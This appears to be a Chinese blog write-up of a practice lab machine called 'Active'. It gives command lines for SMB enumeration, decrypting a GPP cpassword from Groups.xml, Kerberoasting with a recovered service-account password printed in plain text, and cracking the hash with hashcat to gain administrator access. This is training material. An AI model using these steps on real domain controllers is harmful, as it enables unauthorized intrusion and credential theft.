当前位置: 首页 > java >正文

CPTS---Active 复现

java 2025/8/19 17:05:02

枚举和利用

nmap -sC -sV -T4 -Pn -n -p- 10.10.10.100

在这里插入图片描述

nmap -Pn -n 10.10.10.100 -sU --top-ports=100 --reason

在这里插入图片描述

与DC核对调整一下时间
rdate -n 10.10.10.100
在这里插入图片描述
匿名枚举smb共享

nxc smb 10.10.10.100 -u '' -p '' --spider Replication --regex . --smb-timeout 10000

在这里插入图片描述
发现Replication可读,列出全部目录,方便查看共享文件
在这里插入图片描述
发现Groups.xml,尝试下载到本地
在这里插入图片描述
查看
在这里插入图片描述
发现一个cpassword的属性很有兴趣,尝试google,可以使用这个工具
在这里插入图片描述
得到密码
在这里插入图片描述
尝试kerberoasting攻击

nxc ldap 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --kerberoasting kerberoasting.out

在这里插入图片描述
得到管理员hash

hashcat -m 13100 hash rockyou.txt

在这里插入图片描述
得到密码。

提权

利用管理员凭证登陆
在这里插入图片描述
成功

http://www.xdnf.cn/news/18159.html

相关文章:

  • 【matlab】考虑源荷不平衡的微电网鲁棒定价研究
  • 【每日一题】Day 7
  • C 语言数据结构与算法的复杂度分析:从理论到实战的效率衡量指南
  • Vue2篇——第五章 Vue.js 自定义指令与插槽核心
  • 【JavaEE】(16) Spring Boot 日志
  • Unity作为库导入Android原生工程
  • 【github-action 如何为github action设置secrets/environment】
  • SpringAI集成MCP
  • (Arxiv-2025)OPENS2V-NEXUS:一个面向主体到视频生成的详细基准与百万规模数据集
  • 【完整源码+数据集+部署教程】织物缺陷检测系统源码和数据集:改进yolo11-RevCol
  • [数据结构] ArrayList 与 顺序表
  • 【前端进阶】UI渲染优化 - 骨架屏技术详解与多框架实现方案
  • RH134 管理网络安全知识点
  • CMake指令:查找文件(find_file)、查找目录(find_path)、查找库文件(find_library)
  • ANSI终端色彩控制知识散播(I):语法封装(Python)——《彩色终端》诗评
  • 图论Day5学习心得
  • 【运维进阶】LNMP + WordPress 自动化部署实验
  • 《Image Classification with Classic and Deep Learning Techniques》复现
  • [Code Analysis] docs | Web应用前端
  • 深度学习-计算机视觉-微调 Fine-tune
  • 学习游戏制作记录(各种独特物品效果)8.18
  • 机器学习-决策树:从原理到实战的机器学习入门指南
  • AI大模型实战:用自然语言处理技术高效处理日常琐事
  • 嵌入式设备Lwip协议栈实现功能
  • 【软考架构】第4章 密钥管理技术和访问控制及数字签名技术
  • 【前端】使用Vue3过程中遇到加载无效设置点击方法提示不存在的情况,原来是少加了一个属性
  • 【大模型】RAG
  • 8.19 note
  • 云原生俱乐部-mysql知识点归纳(1)
  • cesium中实时获取鼠标精确坐标和高度